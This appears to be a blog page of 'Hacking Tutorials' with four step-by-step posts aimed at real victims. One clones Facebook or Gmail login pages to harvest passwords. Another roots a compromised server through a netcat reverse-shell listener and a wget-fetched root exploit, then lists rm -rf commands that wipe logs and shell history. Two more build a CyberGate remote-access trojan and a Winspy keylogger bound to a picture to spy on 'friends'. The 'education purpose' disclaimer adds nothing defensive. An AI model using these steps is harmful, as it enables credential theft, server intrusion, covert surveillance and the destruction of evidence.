Showing posts with label Hacking Tutorials. Show all posts

Hack Facebook account and gmail account using Backtrack 5

2 comments
In my previous tutorial I have explained “ How to hack facebook account using phishing ” , Now in this tutorial I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps.
Open your backtrack 5’s terminal and type cd /pentest/exploits/set



Now Open social Engineering Tool kit (SET) ./set


Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)

Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER

Then select 2nd option “Site Cloner” and Hit ENTER


Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)
Now just hit the enter. 



Open new terminal and just type ifconfig and hit ENTER



Now just copy this IP address and open it in Browser.
 Now here I am just typing test email and password to see whether it works or not.
Now just hit enter and switch back to our terminal and we found the Email and password ! 



Note-This Tutorial only for education purpose only

Read More »

Server Rooting Tutorials -Full Guide with SS

0 comments
Hi guys today i will tell you how to root a server in few easy steps .

Things Required :

NetcaT
Shelled site
Local root expl0it

Step By Step Tutorial :
First go to Run & type cmd then type :
Code:
cd C:\Program Files\Netcat
( Make sure that you Netcat is saved in the following directory ) .

[Image: 11.jpg]

Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .

[Image: 12.jpg]

Its time to open your shell & then connect using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .

[Image: 13.jpg]

[Image: CWINDOWSsystem32cmd.exe+-+nc+-n+-l+-v+-p...127+AM.jpg]

So you have successfully connected .. Then now we have to get our Local Root Exploit, like mine is 2.6.18-374 2011 .

[Image: 14.jpg]

In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder .
Type this command to change dir to /tmp :
Code:
cd /tmp
To upload your your exploit we will use wget function .
Type :
Code:
wget http://www.somesite.com/exploit.c


Now this will upload the exploit in the tmp folder .

[Image: 15.jpg]

(Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type :
Code:
gcc exploit.c -o exploit

Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit.

(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .

Type:
Code:
unzip exploit.zip


After we have done all the above steps correctly, its time to give permission so we will type the following command

Type:
Code:
chmod 777 exploit

Now its time to run the Exploit, to run the exploit we will type the following command
Type:
Code:
./exploit

Now the exploit will run & the server will be rooted ;) . To check weather we got root we can type

Type:
Code:
id or whoami

Clearing Logs:

Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .

Code:
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

Hope you all guys have enjoyed this Tutorial .. If you have any Doubts then just mention it Via reply !

Use this hack wisely :)

And the download links

Netcat : Click Here
Local root exploit : Click Here

Read More »

How to Hack your Friends Computer using Cybergate?

0 comments
1) Download the Software Cybergate .
2)Install Cybergate.
3)After Installation it will ask you for the Password.
Default Password: cybergate
[Image: 1.JPG]

4)Once you have put the password, Click on Login.
You will get the message
CyberGate Station is now unlocked and fully functional.
5)After that Click on control Center ==>Start
[Image: 2.JPG]
It will Ask you for the Port Number. You can assign any Port number from 0 to 65535.But remember don't assign well known Ports like 80,21 etc..
6) Once You have Assign the Port Number ,Go to Control Center ==>Builder==>Create Server
[Image: 3.JPG]
After that Add the New User==>>Ok==>>Then Double Click on the User you have Add
[Image: 4.JPG]
7)Now Click on Add.
[Image: 5.JPG]
After that you will need to add your IP Addresswith the Port number you have add before.
Eg: 192.168.1.1:999
To get You IP address go to Run==>cmd==>>ipconfig
8)Once you have Added the IP address and Port number go to Installation Tab .
[Image: 6.JPG]
Here you will get Different Option.
=>Installation Directory :
Now Select any one option. where you want to infect your trojan in your Friends computer .
=>Boot:
Select Registry option also .
Always Select the Random keys for Active Setup and Mutex.
=> Inject Into:
Mostly Select the Default Browser.
9)Now go to Message Tab:
[Image: 7.JPG]
You can display any message on your Friends computer , when he opens your File..
10)Now go to Keylogger Tab:
[Image: 8.JPG]
It will give you all the Keystrokes of your Friends computer.
11)Now Directly Create Server:
Click on Create Server and Save you File ..
After that just give this file to your Friend and when he click on that File you will get the access of his system.
You can download his files at your End.If the Person is having the Webcam you can access it..That's you are Having the Total Control of his System..
Note: You will maintain the Access till you have the same IP assign to your Computer..

Read More »

How to Hack Email password using Winspy Keylogger-Step By Step Tutorials

1 comments
Winspy keylogger is a Complete Stealth Monitoring software that can be used to spy on both your Local PC and Remote PC .Many of my blog readers who are new to Key logging found it difficult to use this Keylogger. So to help them, Today i will be writing a tutorial on How you can use Winspy Keylogger to hack your friends email passwords

How To Hack Email Passwords Using Winspy Keylogger 

1. First a fall download a copy of  Winspy keylogger  From Here

2. After Downloading run the application , You will be prompted to enter a user name and password ,Enter any Username and password, You will use this username and password every time to login into Winspy Keylogger , After you install the keylogger, restart your computer

3. After restarting press  ctrl + shift + f12  ( Host keys - short cut to loginto winspy ) , A login box will pop out  prompting for your username and password, Enter the username and password which you created earlier finally click OK to login 


4. After you loginto Winspy, select remote at the top , Then click remote install 



5. A pop up box will appear as shown in the image,


Enter the following info in it 

  • User - Any name
  • File name - any name you want.Use the name such that victim will accept it.
  • File icon - Any icon you want (my advice- keep the same ) 
  • Picture - Select the picture you want to apply to the keylogger.

Now there are 5 different ways by which you can receive key logs and images of your victims computer , in this tut i will use email option as it is the easiest way

Select Emailer tab and enter your email address, Hotmail accounts do not accept keylog files, so use another email account id, I  suggest you to use Gmail, That's it. This much is enough. If you want, you can change other settings also.

6. After you have completed changing the settings, click on “Create Remote file”. Now a pop up box will appear as shown in the image


You can combine any file with your keylogger file , I recommend you to combine a picture, So Now When the victim clicks on the file Win Spy Software will install silently and victim will only see the picture which you  included .Thus the victim will not get suspicious

7. Now send the Keylogger  file to your victim.via email, Now when your victim opens the file, Win Spy Software will install silently, After which it will send all keystrokes typed by the victim to your email inbox. Thus, you will get all his passwords and thus you will be able to hack his email accounts

Hope you like the Article.

Read More »